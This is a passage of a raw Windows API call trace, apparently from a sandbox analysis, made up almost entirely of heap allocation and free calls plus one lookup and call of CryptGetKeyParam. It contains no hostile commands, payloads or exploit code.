(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.259] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0184.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.260] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0184.261] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.262] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.265] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0184.265] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.276] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.276] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 